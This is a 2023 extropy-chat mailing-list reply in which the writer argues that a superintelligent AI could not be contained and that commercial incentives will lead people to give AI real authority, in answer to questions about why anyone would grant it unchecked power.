[ExI] Eliezer Yudkowsky New Interview - 20 Feb 2023
Gadersd
gadersd at gmail.com
Tue Feb 28 16:14:35 UTC 2023
>>Why would you ask a super intelligent AI with solving goals rather than asking it how the goals could be achieved?
A super intelligence wouldn’t need to be “asked.” Try caging something 1000x smarter than yourself. You had better hope its goals are aligned with yours.
>>Why would you give a super intelligent AI the unchecked power to do potentially catastrophic things?
Because it’s profitable to give AI the authority to perform tasks traditionally done by humans. A super intelligence can potentially do quite a lot of harm with relatively little authority. A super intelligent hacker only needs to find a basic software bug to gain access to the internet and imagine what might happen next.
> On Feb 27, 2023, at 6:02 PM, Dave S via extropy-chat <extropy-chat at lists.extropy.org> wrote:
>
> On Monday, February 27th, 2023 at 12:48 PM, Gadersd via extropy-chat <extropy-chat at lists.extropy.org> wrote:
>
>> Please note the term “well-defined.” It is easy to hand wave a goal that sounds right but rigorously codifying such as goal so that an AGI may be programmed to follow it has so far been intractable.
>
> Why would you ask a super intelligent AI with solving goals rather than asking it how the goals could be achieved?
>
> Why would you give a super intelligent AI the unchecked power to do potentially catastrophic things?
>
> -Dave
> _______________________________________________
> extropy-chat mailing list
> extropy-chat at lists.extropy.org
> http://lists.extropy.org/mailman/listinfo.cgi/extropy-chat
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.extropy.org/pipermail/extropy-chat/attachments/20230228/a66f6d7a/attachment.htm>
More information about the extropy-chat
mailing list